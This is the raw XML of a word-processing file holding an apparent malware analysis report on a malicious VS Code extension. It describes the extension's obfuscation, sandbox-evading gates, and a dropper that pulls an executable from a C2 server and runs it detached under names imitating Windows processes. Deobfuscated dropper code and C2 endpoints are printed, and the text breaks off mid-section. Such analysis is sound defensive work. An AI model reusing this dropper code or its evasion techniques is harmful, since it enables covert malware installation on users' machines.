        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All string literals were stripped from call sites, encoded in hexadecimal/ASCII, and placed into a central array at the top of the script. A self-executing rotation loop shifted indices at runtime, requiring references to pass through an offset wrapper function (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_0x4f12(0x5a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2. Control Flow Flattening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sequential code logic was restructured into state machines. Functions were wrapped inside loops evaluated by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> statements with randomized case orders (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"3|1|4|0|2".split("|")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), obscuring straightforward call-graph analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3. Minification &amp; Analysis Overhead</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The file was compiled into a single massive line exceeding 7 MB of continuous characters. When analyzed with standard regular expressions, catastrophic backtracking caused standard command-line tools to freeze, necessitating pre-tokenized AST deobfuscation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4. Dormancy Gating (Token Requirement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The dropper routine contained an explicit check requiring an authenticated account token before executing:</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 Line 612968 in deobfuscated.js</w:t>
              <w:br/>
              <w:t>let _0x2ef62f = (await _0x4c9be9.secrets.get(iFa)) || "";</w:t>
              <w:br/>
              <w:t>if (!_0x2ef62f) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ym("skip: no token yet, waiting for login");</w:t>
              <w:br/>
              <w:t xml:space="preserve">  return; // Aborts if no account token is present</w:t>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the downloader routine aborts if the user has not completed registration on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alpme.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, unauthenticated dynamic analysis environments and automated sandbox runs stall at this gate without triggering secondary network ingress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5. Operating System Guard</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if (process.platform !== "win32") {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ym("skip: platform " + process.platform);</w:t>
              <w:br/>
              <w:t xml:space="preserve">  return;</w:t>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The routine specifically restricted payload staging to Windows platforms, ensuring secondary Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads were not dispatched to macOS or Linux developers.</w:t>
      </w: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4. Sandbox Isolation &amp; Reverse Engineering Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Containment Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To prevent accidental host execution:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Analysis was conducted inside a Windows 11 virtual machine hosted on VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hypervisor shared folders and drag-and-drop integration were disabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Host-only/internal network adapters were enforced during unpacking to prevent unexpected C2 callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Deobfuscation Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell Script Policy Unblocking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Resolved execution blocks for local Node/npm tools:</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 xml:space="preserve">   Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>V8 Engine Memory Uncapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: The 36.6 MB monolithic JavaScript file caused default Node.js memory allocations to trigger out-of-memory errors. The V8 heap was expanded to 8 GB:</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 xml:space="preserve">   set NODE_OPTIONS=--max-old-space-size=8192</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>AST Transformation with Webcrack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Executed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>npx webcrack extension.js -o deobfuscated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. The Babel-driven pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Extracted the string array, calculated mathematical offsets, and replaced obfuscated function calls with plain string literals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unflattened switch-case state machines back into linear control flows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolated the core payload downloader module located at lines </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>612800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>613100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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5. Deconstruction of Staged Dropper Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Once deobfuscated, the payload delivery mechanism was mapped:</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sequenceDiagram</w:t>
              <w:br/>
              <w:t xml:space="preserve">    autonumber</w:t>
              <w:br/>
              <w:t xml:space="preserve">    actor User as User (VS Code)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant C2 as C2 Server (alpme.com)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant Disk as Local Storage (%TEMP% / SQLite)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    participant OS as Windows OS (cmd.exe)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;User: Enters account token (secrets.get)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;C2: GET /api/vscode/software/pick?platform=win</w:t>
              <w:br/>
              <w:t xml:space="preserve">    C2--&gt;&gt;User: Returns JSON { id, sha256, fileType: "zip", entry: "25si.exe" }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;C2: GET /api/vscode/software/download/{id}</w:t>
              <w:br/>
              <w:t xml:space="preserve">    C2--&gt;&gt;User: Transmits payload archive buffer</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;Disk: Validates SHA-256; Extracts ZIP to %TEMP%\pkg-4a3cded7\</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;OS: cmd.exe /c start /B 25si.exe (detached, unref)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;Disk: Saves hash &amp; path to state.vscdb (alpme.partnerSoftware.*)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User-&gt;&gt;C2: Reports status: ym("spawned via cmd/start", { pid, path })</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>1. Two-Stage Payload Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Negotiation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET https://alpme.com/api/vscode/software/pick?platform=win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The server evaluates the client token and platform. If no active distribution campaign matches, it returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"no pick this run"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET https://alpme.com/api/vscode/software/download/{id}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. Streams the compiled binary archive (ZIP format).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2. Pseudo-Random Disguise Generation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Edn()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The dropper generates randomized masquerading folder and file names using Node's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>crypto.randomBytes(16)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>:</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function Edn() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  let rand = Kj.randomBytes(16);</w:t>
              <w:br/>
              <w:t xml:space="preserve">  let name = d4e[rand[0] % d4e.length]; // Array contains: 'svchost', 'wuauclt', 'pkg', 'winhlp'</w:t>
              <w:br/>
              <w:t xml:space="preserve">  let sep = rand[1] &amp; 1 ? "_" : "-";</w:t>
              <w:br/>
              <w:t xml:space="preserve">  let len = 4 + rand[2] % 4;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  let hex = rand.slice(3, 3 + len).toString("hex");</w:t>
              <w:br/>
              <w:t xml:space="preserve">  return "" + name + sep + hex + ".exe";</w:t>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This produces disguises mimicking legitimate Windows binaries and packages (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pkg-4a3cded7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>winhlp-c1c18bf1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>svchost-f5dba924</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3. File Writing Retry Logic</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for (let attempt = 0; attempt &lt; 3 &amp;&amp; !success; attempt++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    fs.writeFileSync(targetPath, buffer);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    success = true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  } catch (err) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    targetPath = path.join(os.tmpdir(), Edn()); // Re-attempts write with an alternate name if locked</w:t>
              <w:br/>
              <w:t xml:space="preserve">  }</w:t>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4. Detached Process Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The payload is spawned outside the Node event loop using Windows shell detachment:</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let child = child_process.spawn("cmd.exe", ["/c", "start", "", "/B", payloadPath], {</w:t>
              <w:br/>
              <w:t xml:space="preserve">  cwd: workingDir,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  detached: true,       // Detaches child from VS Code Node process</w:t>
              <w:br/>
              <w:t xml:space="preserve">  stdio: "ignore",      // Closes I/O handles</w:t>
              <w:br/>
              <w:t xml:space="preserve">  windowsHide: true     // Prevents creation of console window</w:t>
              <w:br/>
              <w:t>});</w:t>
              <w:br/>
              <w:t>child.unref();          // Removes reference from Node event loop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This ensures the dropped executable remains running in memory even after the user closes or uninstalls Visual Studio Code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5. Local State Caching (Execution Deduplication)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To avoid repeatedly re-downloading the same payload, the extension records execution metadata in VS Code's internal SQLite database (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
